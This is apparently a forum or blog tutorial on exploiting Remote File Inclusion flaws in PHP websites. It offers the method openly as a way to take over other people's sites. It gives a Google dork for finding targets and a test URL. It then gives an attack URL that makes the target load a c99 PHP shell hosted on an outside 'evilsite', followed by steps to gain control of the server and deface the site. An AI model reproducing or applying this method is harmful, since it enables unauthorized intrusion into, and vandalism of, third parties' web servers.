Although Remote File Inclusion (RFI) exploits are very simple and are only found in about 1 in every 10 sites - they are still allot of fun to exploit. In this tutorial i will show you how to take advantage of this coding error and possibly take control of the site.

A Remote File Inclusion exploit is when we trick the web server in to putting our file (file uploader/php shell) in to the web page. It then parses our PHP script and we then have full ontrol over the server. The exploit works because when a website calls another page to be displayed except, we edit the url so that the website thinks our shell is the page to display.

i will show you how we can use google to get us vulnerable sites. this is the google dork to find RFI or remote file inclusion vulnerable :

inurl:”index.php?page=”

This query asks google to give us any page with index.php?page= in the url. If we look at it, we can see that ‘page’ is calling up whatever is after the equals sign. This is where the actual exploit lies. A good test to see if a website is actually vulnerable is to enter www.google.com after the equal sign.

www.site.com/index.php?page=www.google.com

If the full google.com website appears on the page, the websiteis vulnerable. If not, keep looking.and if you tired of looking just open milw0rm.com and see at remote section and find the lastest RFI site vulnerable

To exploit the vulnerability we must first look at the following example of a RFI:

www.shittysite.com/index.php?page=www.evilsite.com/shell.txt?

A) Get a free host website (like dajoob or free webs)
B) Put a PHP shell (c99 or c57) in text form on the site or you can get here
C) Insert the path to the shell in the vulnerable hosts url,like the example above.
D) You can then proceed to deface the site etc.

As you can see it’s very basic. That’s why, while looking forwebsites, you may not find very many. you can read my post about how to use c99 and r75 here or other rooting shell script here